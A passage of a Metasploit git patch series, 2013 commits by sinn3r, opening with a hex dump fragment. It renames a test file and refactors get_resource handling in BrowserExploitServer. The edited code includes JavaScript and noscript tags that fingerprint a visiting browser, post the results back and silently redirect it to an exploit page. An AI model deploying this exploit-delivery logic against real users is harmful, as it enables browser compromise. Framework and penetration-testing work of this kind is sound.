+020bf7e8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
+020bf7f8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
+020bf808  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
+=end

From f16aa91302c58855bb5cd82b34c47d40d3f41a70 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 11 Nov 2013 18:32:43 -0600
Subject: [PATCH 72/73] mv rspec

---
 .../server_spec.rb => remote/browser_exploit_server_spec.rb}    | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename spec/lib/msf/core/exploit/{browser/server_spec.rb => remote/browser_exploit_server_spec.rb} (98%)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
similarity index 98%
rename from spec/lib/msf/core/exploit/browser/server_spec.rb
rename to spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
index 889e27360d..f6a4cd13e0 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
@@ -1,6 +1,6 @@
 require 'spec_helper'
 require 'msf/core'
-require 'msf/core/exploit/browser/server'
+require 'msf/core/exploit/remote/browser_exploit_server'
 
 describe Msf::Exploit::Remote::BrowserExploitServer do
 

From fbe1b92c8f9b855837216fa96a4efa90c6608a62 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 12 Nov 2013 17:25:55 -0600
Subject: [PATCH 73/73] Good bye get_resource

---
 .../exploit/remote/browser_exploit_server.rb  | 21 +++++++------------
 1 file changed, 7 insertions(+), 14 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 72626f336a..cd038438d6 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -73,13 +73,6 @@ module Msf
       ], Exploit::Remote::BrowserExploitServer)
     end
 
-    #
-    # Removes the trailing slash for get_resource
-    #
-    def get_resource
-      super.chomp("/")
-    end
-
     #
     # Syncs a block of code
     #
@@ -95,7 +88,7 @@ module Msf
     # @return [String] URI to the exploit page
     #
     def get_module_resource
-      "#{get_resource}/#{@exploit_receiver_page}"
+      "#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
     end
 
     #
@@ -372,8 +365,8 @@ module Msf
         <% end %>
 
         var query = objToQuery(d);
-        postInfo("<%=get_resource%>/<%=@info_receiver_page%>/", query);
-        window.location = "<%=get_resource%>/<%=@exploit_receiver_page%>/";
+        postInfo("<%=get_resource.chomp("/")%>/<%=@info_receiver_page%>/", query);
+        window.location = "<%=get_resource.chomp("/")%>/<%=@exploit_receiver_page%>/";
       }
       |).result(binding())
 
@@ -385,8 +378,8 @@ module Msf
       #{js}
       </script>
       <noscript>
-      <img style="visibility:hidden" src="#{get_resource}/#{@noscript_receiver_page}/">
-      <meta http-equiv="refresh" content="1; url=#{get_resource}/#{@exploit_receiver_page}/">
+      <img style="visibility:hidden" src="#{get_resource.chomp("/")}/#{@noscript_receiver_page}/">
+      <meta http-equiv="refresh" content="1; url=#{get_resource.chomp("/")}/#{@exploit_receiver_page}/">
       </noscript>
       |
     end
@@ -399,12 +392,12 @@ module Msf
     #
     def on_request_uri(cli, request)
       case request.uri
-      when get_resource
+      when get_resource.chomp("/")
         #
         # This is the information gathering stage
         #
         if get_profile(retrieve_tag(request))
-          send_redirect(cli, "#{get_resource}/#{@exploit_receiver_page}")
+          send_redirect(cli, "#{get_resource.chomp("/")}/#{@exploit_receiver_page}")
           return
         end